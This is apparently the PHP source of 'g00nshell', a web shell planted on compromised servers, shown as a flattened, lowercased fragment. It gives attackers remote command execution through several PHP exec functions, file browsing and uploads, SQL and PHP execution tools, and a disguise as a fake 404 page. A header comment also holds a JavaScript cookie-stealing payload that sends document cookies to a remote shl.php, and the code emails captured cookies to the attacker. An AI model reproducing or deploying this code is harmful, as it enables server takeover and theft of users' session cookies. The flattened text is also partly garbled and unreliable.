document.location.href= # #'http://site.com/shl.php?cookie='+document.cookies # # # #in the ajax command shell, type 'home' to return to the shell's # #directory. type 'clear' to clear the output screen. # ##########################verification levels######################### #0: no protection; anyone can access # #1: user-agent required # #2: require ip # #3: basic authentication # ##############################known bugs############################## #the sql tool is not complete. there is currently no editing function# #available. some time in the future this may be fixed, but for now # #don't complain to me about it # ################################shouts################################ #pr0be - beta testing & css # #trintitty - beta testing # #clorox - beta testing # #everyone else at g00ns.net # ########################note to administrators######################## #if this script has been found on your server without your approval, # #it would probably be wise to delete it and check your logs. # ###################################################################### */ // configuration $auth = 0; $uakey = "b5c3d0b28619de70bf5588505f4061f2"; // md5 encoded user-agent $ip = array("127.0.0.2","127.0.0.1"); // ip addresses allowed to access shell $email = ""; // e-mail address where cookies will be sent $user = "af1035a85447f5aa9d21570d884b723a"; // md5 encoded user $pass = "47e331d2b8d07465515c50cb0fad1e5a"; // md5 encoded password // global variables $version = '1.4 beta'; $self = $_server['php_self']; $soft = $_server['server_software']; $servinf = split('[:]', $_server['http_host']); $servip = $servinf[0]; $servport = @$servinf[1] ? $servinf[1] : '80'; $cmd = @$_get['cmd']; $act = @$_get['act']; $cmd = @$_get['cmd']; $curdir = cleandir(getcwd()); if(@$_get['dir']){ $dir = $_get['dir']; if($dir != 'nullz') $dir = cleandir($dir); }
$contents = @$_post['contents']; $gf = @$_post['gf']; $img = @$_get['img']; // credits to disruptiv for this bit ;) if(count(get_included_files()) > 1 || count(get_included_files()) > 1) list($me) = explode("&", $_server['request_uri']); else $me = $php_self . "?"; @session_start(); @set_time_limit(5); switch($auth){ // authentication switcher case 1: if(md5($_server['http_user_agent']) != $uakey) hide(); break; case 2: if(!in_array($_server['remote_addr'],$ip)) hide(); break; case 3: if(!$_server['php_auth_user']) userauth(); break; default: break; } function cleandir($d){ // function to clean up the $dir and $curdir variables $d = realpath($d); $d = str_replace("\\\\", "\\", $d); $d = str_replace("////", "//", $d); return($d); } function userauth(){ // basic authentication function global $user, $pass; header("www-authenticate: basic realm='secure area'"); if(md5($_server['php_auth_user']) != $user || md5($_server['php_auth_pw'] != $pass)) hide(); } function get_exec_function(){ // command execution method finder $exec_functions = array("popen", "exec", "shell_exec", "system", "passthru"); $disabled_funcs = ini_get('disable_functions'); foreach($exec_functions as $f) if(strpos($disabled_funcs, $f) === false) return $f; } function execute_command($exec_function, $command){ // command execution function switch($exec_function){ case "popen": $h = popen($command, "r"); while(!feof($h)) echo(fgets($h)); break; case "exec": exec($command, $result); foreach($result as $r) echo($r . "\n"); break; case "shell_exec": echo(shell_exec($command)); break; case "system": system($command); break; case "passthru": passthru($command); break; } } if(!$act && !$cmd && !@$_get['cookie'] && !@$_get['f'] && !@$dir && !$gf && !$img && !@$_get['ajxcmd']) main(); elseif(!$act && $cmd){ // raw command execution style(); echo("
results:\n
");
echo(""); } elseif(@$_get['ajxcmd']){ // command execution for ajax shell if($_get['ajxcmd'] == "home") $_session['work_dir'] = getcwd(); elseif($exec_function = get_exec_function()){ if(strpos($_get['ajxcmd'], 'cd') === 0){ $c = array_pop(explode(" ", $_get['ajxcmd'])); if(@is_dir($_session['work_dir'] . directory_separator . $c) && $c[0] != '\\' && $c[0] != '//') $_session['work_dir'] .= directory_separator . $c; elseif(@is_dir($c) && $c[0] != '.') $_session['work_dir'] = $c; else echo("invalid directory\n"); } else{ @chdir($_session['work_dir']); execute_command($exec_function, $_get['ajxcmd']); } } else die("all execution methods disabled."); } elseif(@$_get['cookie']){@mail($email, "cookie data", @$_get['cookie'], "from: $email"); hide();} // cookie stealer function elseif($act == 'view' && @$_get['f'] && $dir) view($_get['f'], $dir); elseif($img) img($img); elseif($gf) grab($gf); elseif(@$dir) files($dir); else{ switch($act){ case 'phpinfo': phpinfo();break; case 'sql': sql();break; case 'files': files(@$dir);break; case 'email': email();break; case 'cmd': cmd();break; case 'upload': upload();break; case 'tools': tools();break; case 'sqllogin': sqllogin();break; case 'sql': sql();break; case 'lookup': lookup();break; case 'kill': kill();break; case 'phpexec': execphp();break; case 'bshell': bshell();break; default: main();break; } } function hide(){ // hiding function global $self, $soft, $servip, $servport; header("http/1.0 404 not found"); ?>
404 not found not found
the requested url was not found on this server.
additionally, a 404 not found error was encountered while trying to use an errordocument to handle the request.
> g00nshell v. <style> body { background-color:#000000; color:white; font-family:verdana; font-size:11px; } h1,h3 { color:white; font-family:verdana; font-size:11px; } input,textarea,select,button { color:#ffffff; background-color:#000000; border:1px solid #4f4f4f; font-family:verdana; font-size:11px; } textarea { font-family:courier; } a { color:#6f6f6f; text-decoration:none; font-family:verdana; font-size:11px; } a:hover { color:#7f7f7f; } td { font-size:12px; vertical-align:middle; } th { font-size:13px; vertical-align:middle; } table { empty-cells:show; } .inf { color:#7f7f7f; } 'command execute','files'=>'file view','phpinfo'=>'php info', 'phpexec'=>'php execute', 'tools'=>'tools','sqllogin'=>'sql','upload'=>'get files','kill'=>'kill shell'); $capt = array_flip($act); echo("